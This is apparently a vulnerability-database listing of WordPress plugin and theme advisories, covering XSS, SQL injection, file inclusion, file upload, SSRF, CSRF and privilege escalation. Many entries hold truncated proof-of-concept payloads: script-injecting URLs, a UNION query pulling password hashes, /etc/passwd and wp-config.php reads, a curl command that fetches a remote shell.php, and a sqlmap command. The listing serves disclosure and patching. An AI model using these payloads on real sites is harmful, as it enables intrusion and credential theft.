Loginizer 1.3.8-1.3.9 - Unauthenticated Stored Cross-Site Scripting (XSS)
Versions 1.3.8 to 1.3.9 of the Loginizer WordPress plugin were found to be vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability was due to the plugin's logging functionality using the $_SERVER['REQUEST_URI'] PHP variable to create a URL string that was logged to the database without any inpu...
Responsive Cookie Consent <= 1.7 - Authenticated Stored Cross-Site Scripting (XSS)
A persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Tested on versions 1.5, 1.6 and 1.7; older versions may also be affected. 1...
Pinfinity Theme <= 1.9.2 - Reflected Cross-site Scripting (XSS)
The pinfinity WordPress theme was affected by a Reflected Cross-site Scripting XSS security vulnerability. https://website.com/wp/?s=alert1...
Podlove Podcast Publisher <= 2.5.3 - Authenticated SQL Injection
During the security analysis, ThunderScan discovered an SQL injection vulnerability in the Podlove Podcast Publisher WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugi...
WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation
You can log in as anyone without knowing the password because of incorrect usage of wp_set_auth_cookie. Username:...
Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS
Multiple stored XSS vulnerabilities were found while logged in as a low-privileged user. Authenticated Stored XSS: Logged in as an affiliate, a low-privileged user. Profile Edit Account. Write the payload in the 'Last Name' input area: jaVasCript:/-///'/"/// /oNMouseoVer=alertdocument.domain Other fields may be...
All In One Schema.org Rich Snippets <= 1.4.4 - Authenticated Cross-Site Scripting (XSS)
The Schema – All In One Schema Rich Snippets WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://vulnerablesite.com/wp-admin/admin.php?page=richsnippetdashboard&bsfforcesend=true&bsfsendlabel=alert1...
Raygun4WP <= 1.8.0 - Unauthenticated Reflected XSS
The Raygun4WP WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. http://www.example.com/wp-content/plugins/raygun4wp/sendtesterror.php?backurl="...
Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/?author=1...
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
The fast-image-adder WordPress plugin was affected by an Unauthenticated Remote File Upload security vulnerability. $ curl http://www.example.com/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://sitewithshellstodl/shell.php Shell location is reported back t...
MDC YouTube Downloader <= 2.1.0 - Local File Inclusion
The MDC YouTube Downloader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd...
Pie Register 2.0.14-2.0.15 - SQL Injection
User input is not validated correctly when accepting an Invitation Code, so an SQL injection attack is possible. This attack is triggered when the parameters ‘showdashwidget’ and ‘invitaioncode’ are provided to any page, by any user, anonymous or otherwise. import requests,base64,re...
Fusion Engage 1.0.5 - Local File Disclosure
The fusion-engage WordPress plugin was affected by a Local File Disclosure security vulnerability. curl --data "action=fegetsvhtml&video=../wp-config.php" "http://www.example.com/wp-admin/admin-ajax.php";...
Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User
The ajax-search-pro WordPress plugin was affected by a Cross-Site Request Forgery CSRF Add User security vulnerability. This will register an administrator with username "xADMIN" and password "xPASS": POST request to:...
WP Planet <= 0.1 - Unauthenticated Reflected XSS
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/wp-planet/rss.class/scripts/magpiedebug.php?url=alert1...
Realia <= 1.4 - Unauthenticated IDOR leading to Arbitrary Post Deletion
While investigating an IDOR issue on a premium theme, allowing arbitrary deletion of Ads, submitted by Vlad Vector, the Realia plugin was found to be the root cause. In fact, having this plugin installed, which some themes require, can allow unauthenticated attackers to delete arbitrary posts, by...
Responsive Lightbox2 < 1.0.3 - Authenticated Stored Cross-Site Scripting
The ‘hyperlink’ field used while linking an image from a URL was found to be vulnerable to stored XSS, as the plugin did not sanitize user-given input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using...
Fancy Lightbox < 1.0.2 - Authenticated Stored Cross-Site Scripting
The ‘hyperlink’ field used while linking a remote resource (image, video or web page) from a URL was found to be vulnerable to stored XSS, as the plugin did not sanitize user-given input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used...
Easy Media Download < 1.1.5 - Authenticated Stored Cross-Site Scripting
The ‘Button Text’ field used while posting a file download was found to be vulnerable to stored XSS, as the plugin did not sanitize user-given input properly before publishing the post. It is triggered when a user loads a page where the plugin shortcode is used. All WordPress websites using Easy...
Admin Menu <= 1.1 - Authenticated Cross-Site Scripting (XSS)
The Admin Menu WordPress plugin, versions 1.1 and below, was vulnerable to Authenticated Cross-Site Scripting (XSS) within the "role" GET parameter. http://www.example.com/wp-admin/admin.php?page=admin-menu-pro&role=alertString.fromCharCode88,83,83...
Ultimate Appointment Booking & Scheduling < 1.1.10 - Authenticated Cross-Site Scripting (XSS)
The Ultimate Appointment Booking & Scheduling WordPress plugin, versions 1.1.9 and older, was vulnerable to Authenticated Cross-Site Scripting (XSS) within multiple parameters...
Reality < 2.5.6 - Multiple Reflected Cross-Site Scripting (XSS)
Unauthenticated and authenticated reflected XSS vulnerabilities were discovered in the Reality theme through 2.5.3 and 2.5.5 for WordPress. Unauthenticated Reflected XSS: http://reality.inwavethemes.com/properties/?status=&keyword=1%22--%3E&label=1%22--%3E%3Cimg%20src=x%20onerror=alertXSS%3E v...
Travel Booking < 2.8.4 - Unauthenticated Cross-Site Scripting (XSS)
Unauthenticated Reflected XSS via the childnumber parameter https://example.com/search-on-sidebar/?childnumber=%22%20autofocus%20%27--%3E--!%3E%3CInput/Autofocus//Onfocus=alertXSS//%3E...
Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
There is an XSS vulnerability in Careerfy. https://careerfy.net/demo/jobs-listing/?searchtitle=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&locradius=50&sectorcat=...
Xenon Theme <= 1.3 - Unauthenticated Cross-Site Scripting (XSS)
The premium Xenon WordPress theme was found to be vulnerable to Unauthenticated Cross-Site Scripting XSS in the "q" parameter of the /data/typeahead-generate.php page. The affected version of the plugin was 1.3 and below, however, the vendor fixed the vulnerability but did not bump the version...
Merge + Minify + Refresh < 1.10.7 - Authenticated Arbitrary File Delete
The plugin relied on the is_admin check, without checking the user's capabilities, when deleting arbitrary files. The functionality was also vulnerable to Cross-Site Request Forgery (CSRF), allowing attackers to delete arbitrary files by tricking authenticated users into visiting a page they...
Auth0 < 3.11.3 - Unauthenticated Reflected XSS via wle Parameter
XSS via a wle parameter associated with wp-login.php. WP/wp-login.php?wle=%22%20onEvent%3DX186697040Y2Z%20...
Registration Magic < 4.6.0.3 - Authenticated SQL Injection via Form_id
The RegistrationMagic – Custom Registration Forms and User Login WordPress plugin was affected by an Authenticated SQL Injection via Formid security vulnerability. https://example.com/wp-admin/admin.php?page=rmanalyticsshowform&rmformid=selectfromselectsleep20a&rmtr=30...
Resim Ara <= 3.0 - Unauthenticated Reflected XSS
The WordPress plugin team was notified on January 17th, 2020. Note: There were inconsistencies between the versions from the readme.txt 3.0, the plugin file 1.0 as well as tags 1.0 to 3.0...
JobMonster < 4.5.2.9 - Unauthenticated Reflected Cross-Site Scripting
In the theme JobMonster there is an XSS vulnerability, as the input for the search form is provided through unsanitized GET requests. Note WPScanTeam: It's unclear which exact version fixed the issue, but the lowest we were able to test and confirm remediation was 4.5.2.9...
Sliced Invoices <= 3.8.2 - Multiple Vulnerabilities
- Unauthenticated information disclosure, allowing attackers to access arbitrary invoices and quotes containing PII
- Authenticated SQL injection and information disclosure
- Additional issues, such as lack of CSRF and Authorisation checks on AJAX methods used to search invoices.
-...
Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint. curl -i -s -X $'POST' \ -H $'Host: 192.168.158.128:8000' \ --data-binary $'"url":"http://db:3306"' \ $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data' See the references for...
Checklist <= 1.1.5 - Unauthenticated Reflected XSS
The fill parameter of the images/checklist-icon.php file is affected by a reflected XSS issue wp-content/plugins/checklist/images/checklist-icon.php?&fill="alert"XSS"...
My Calendar <= 3.1.9 - Unauthenticated Cross-Site Scripting (XSS)
Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. http://www.domain.de/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%2FOPENBUGBOUNTY%2F%3E...
File Manager < 3.0 - Authenticated Reflected Cross-Site Scripting (XSS)
Lack of sanitisation in the lang parameter in the admin dashboard could allow an attacker to perform reflected XSS attacks against logged-in administrators. https://example.com/wp-admin/admin.php?page=wpfilemanager&lang=zhCNalertXSS...
WF Cookie Consent <= 1.1.3 - Authenticated Persistent Cross-Site Scripting (XSS)
The WF Cookie Consent WordPress plugin was affected by an Authenticated Persistent Cross-Site Scripting (XSS) security vulnerability.
1. Access the WordPress control panel.
2. Navigate to 'Pages'.
3. Add a new page and insert the script you wish to inject into the page title.
4. Now navigate to...
WP with Spritz 1.0 - Unauthenticated File Inclusion
The WP with Spritz WordPress plugin was affected by an Unauthenticated File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd...
WP Security Audit Log Plugin <= 3.1.1 - Sensitive Information Disclosure
No protection on the wp-content/uploads/wp-security-audit-log/ directory, which is indexed by Google and allows attackers to possibly find user information (bad login attempts). Google Dork: inurl:/wp-content/uploads/wp-security-audit-log/...
WP Fastest Cache <= 0.8.7.4 - Blind SQL Injection
Improper escaping of user input when deleting the cache of specific pages leads to an SQL injection vulnerability. esc_sql was used on the input, but the result was used unquoted in the constructed SQL query. Send a GET request to "URL/wp-admin/admin-ajax.php?action=wpfcclearcachecolumn&id=1 PAYLOAD"...
Custom Permalinks <= 1.1 - Cross-Site Scripting (XSS)
User controllable input in the admin page of Custom Permalinks gets output without any escaping. URL/wp-admin/admin.php?page=custom-permalinks-post-permalinks&s=alert1...
AccessPress Anonymous Post Pro < 3.2.0 - Unauthenticated Arbitrary File Upload
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows the attacker to upload anything they want, bypassing the filters. OST...
InLinks 1.0 - Authenticated SQL Injection
SQL injection in POST parameter "keyword". Affected file: inlinks/inlinks.php. Affected lines:
58 $Keyword = trim($_POST['keyword']);
59 $URL = trim($_POST['url']);
60 $Rel = trim($_POST['rel']);
61 $Target = trim($_POST['target']);
62 $tablename = $wpdb->prefix . "URLKeywordsMapping";
63 $SelectKeywordURLMappingDetails ...
pootle button <= 1.1.1 - Authenticated Cross-Site Scripting (XSS)
The pootle button WordPress plugin was affected by an Authenticated Cross-Site Scripting XSS security vulnerability. http://example.com/wp-admin/admin-ajax.php?action=pbtndialog&assetsurl=%22%3E%3Cimg%20src=x%20onerror=alert1%3E...
WP Like Post <= 1.5.2 - Authenticated SQL Injection
It's possible to inject SQL via several points (the Client-IP header, for example) when using the gslplikepost shortcode. A low-privileged account is necessary for this; subscriber is enough. Found by: Paul Dannewitz. Other vulnerabilities submitted to wpvulndb:...
I Recommend This <= 3.8.1 - Authenticated SQL Injection
Plugin description: "This plugin allows your visitors to simply like/recommend your posts instead of comment on it." Active installs according to https://wordpress.org/plugins/i-recommend-this/: 40.000+ It's possible to inject SQL into the dotrecommends shortcode, if the check for IP addresses is...
Link-Library <= 5.9.13.26 – Authenticated SQL Injection
Type of user access: admin user. $_GET['linkid'] is not escaped. http://localhost:8080/wp-admin/admin.php?page=link-library&genthumbsingle=1&linkid=1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCATuserlogin,char58,userpass,17,18,19,20,21,22,23,24,25,26+FROM+wpusers+WHERE+ID=1...
AJAX Random Posts <= 0.3.3 - Unauthenticated PHP Object Injection
The plugin ajax-random-posts insecurely trusts serialized data submitted over HTTP requests. This opens up the site to a PHP object injection vulnerability as a potential exploit vector. The original researcher notified the WordPress Plugins team. The attack is exploitable over AJAX calls on sites with the...
ZM Gallery 1.0 – Authenticated Blind SQL Injection
The plugin is still affected and has been closed. Type of user access: admin user. $_GET['order'] is escaped incorrectly. Attack with blind injection: python sqlmap.py -u "http://www.example.com/wp-admin/admin.php?page=zmgallery&orderby=name&order=desc" --dbs --cookie="cookie of admin user" --level=5...
Woo Email Control <= 1.01 - Reflected Cross-Site Scripting (XSS) & CSRF
Due to a lack of encoding and CSRF mitigation in the testemail function found on line 106 of classes/class-wooctrl.php, it is possible to automate a request to the AJAX handler for the wooctrlsendtestemail action which will reflect the specified script back to the end user...
Stream <= 3.0.5 - Unauthenticated Events Export
The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...